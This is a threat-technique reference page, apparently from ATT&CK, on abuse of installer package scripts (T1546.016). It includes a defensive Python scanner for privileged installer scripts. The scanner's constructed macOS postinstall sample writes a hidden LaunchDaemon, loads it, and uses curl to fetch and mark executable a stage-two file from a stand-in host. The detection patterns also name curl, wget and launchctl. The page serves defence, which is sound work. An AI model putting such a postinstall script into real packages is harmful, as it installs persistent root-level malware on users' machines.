T1546.016 Installer Packages
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS-specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.[5]
Using legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS postinstall scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a Launch Daemon) with the elevated permissions.[1][4]
Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include preinst, postinst, prerm, and postrm scripts and run as root when executed.
For Windows, the Microsoft Installer service uses .msi files to manage the installing, updating, and uninstalling of applications. Adversaries have leveraged Prebuild and Postbuild events to run commands before or after a build when installing .msi files.[3][2]
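A defender-side triage check for the scripts described above, added here as an example (it is not part of the ATT&CK page or of any real tooling): it scans the privileged maintainer and installer script names the text lists for the behaviours the text associates with abuse (writes under LaunchDaemons, launchctl loads, downloads, hidden files, marking files executable). The sample scripts, the indicator patterns and the example.invalid host are constructed for the example.

```python
import re

# Constructed sample scripts (not from any real package): two benign Debian
# maintainer scripts and one macOS postinstall that mirrors the pattern
# described above (a hidden plist copied into LaunchDaemons and loaded as root).
SAMPLE_SCRIPTS = {
    "preinst": "#!/bin/sh\nset -e\n[ -d /var/lib/app ] && rm -rf /var/lib/app/cache\nexit 0\n",
    "postinst": "#!/bin/sh\nset -e\nldconfig\nupdate-rc.d app defaults\n",
    "postinstall": (
        "#!/bin/bash\n"
        'cp "$2/Contents/Resources/.helper.plist" /Library/LaunchDaemons/com.example.helper.plist\n'
        "launchctl load /Library/LaunchDaemons/com.example.helper.plist\n"
        "curl -s https://example.invalid/stage2 -o /tmp/.s && chmod +x /tmp/.s\n"
    ),
}

# Script names that run with root privileges: the Debian-style maintainer
# scripts named in the text and the macOS pkg pre/postinstall scripts.
PRIVILEGED_SCRIPT_NAMES = {"preinst", "postinst", "prerm", "postrm",
                           "preinstall", "postinstall"}

# Behaviours worth a second look when they run from a privileged installer
# script. Heuristic patterns (assumption), not a complete signature set.
INDICATORS = {
    "launchdaemon_write": r"/Library/LaunchDaemons/",
    "launchctl_load": r"\blaunchctl\s+(load|bootstrap)\b",
    "remote_download": r"\b(curl|wget)\b",
    "hidden_file_ref": r"(^|[/\s\"'])\.[A-Za-z0-9_-]+\.(plist|sh|py)\b|/tmp/\.[A-Za-z0-9_]+",
    "make_executable": r"\bchmod\s+\+x\b",
}


def audit_installer_scripts(scripts):
    """Scan privileged installer scripts; return (script, indicator, line_no, line) hits."""
    findings = []
    for name, body in scripts.items():
        if name not in PRIVILEGED_SCRIPT_NAMES:
            continue  # e.g. a README in the bundle: not executed by the installer
        for line_no, line in enumerate(body.splitlines(), 1):
            if line.lstrip().startswith("#"):
                continue  # skip the shebang and comment lines
            for label, pattern in INDICATORS.items():
                if re.search(pattern, line):
                    findings.append((name, label, line_no, line.strip()))
    return findings


def flagged_scripts(scripts):
    """Names of scripts with at least one finding, for triage before rollout."""
    return sorted({hit[0] for hit in audit_installer_scripts(scripts)})
```

On the constructed input only the postinstall script is flagged, with hits on its lines 2 to 4; the two Debian scripts produce no findings.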
Item | Value |
---|---|
ID | T1546.016 |
Sub-techniques | T1546.001, T1546.002, T1546.003, T1546.004, T1546.005, T1546.006, T1546.007, T1546.008, T1546.009, T1546.010, T1546.011, T1546.012, T1546.013, T1546.014, T1546.015, T1546.016 |
Tactics | TA0004, TA0003 |
Platforms | Linux, Windows, macOS |
Permissions required | User |
Version | 1.0 |
Created | 27 September 2022 |
Last Modified | 19 October 2022 |
Procedure Examples
ID | Name | Description |
---|---|---|
S0584 | AppleJeus | During AppleJeus's installation process, it uses postinstall scripts to extract a hidden plist from the application's /Resources folder and execute the plist file as a Launch Daemon with elevated permissions.[6] |
Detection
ID | Data Source | Data Component |
---|---|---|
DS0017 | Command | Command Execution |
DS0022 | File | File Creation |
DS0009 | Process | Process Creation |
References
1. Brandon Dalton. (2022, August 9). A bundle of nerves: Tweaking macOS security controls to thwart application bundle manipulation. Retrieved September 27, 2022.
2. Debian Policy Manual v4.6.1.1. (2022, August 14). Package maintainer scripts and installation procedure. Retrieved September 27, 2022.
3. Global Research & Analysis Team, Kaspersky Lab (GReAT). (2018, August 23). Operation AppleJeus: Lazarus hits cryptocurrency exchange with fake installer and macOS malware. Retrieved September 27, 2022.
4. Patrick Wardle. (2020, June 29). OSX.EvilQuest Uncovered part i: infection, persistence, and more!. Retrieved March 18, 2021.
5. Rich Trouton. (2019, August 9). Installer Package Scripting: Making your deployments easier, one ! at a time. Retrieved September 27, 2022.
6. Patrick Wardle. (2019, October 12). Pass the AppleJeus. Retrieved September 28, 2022.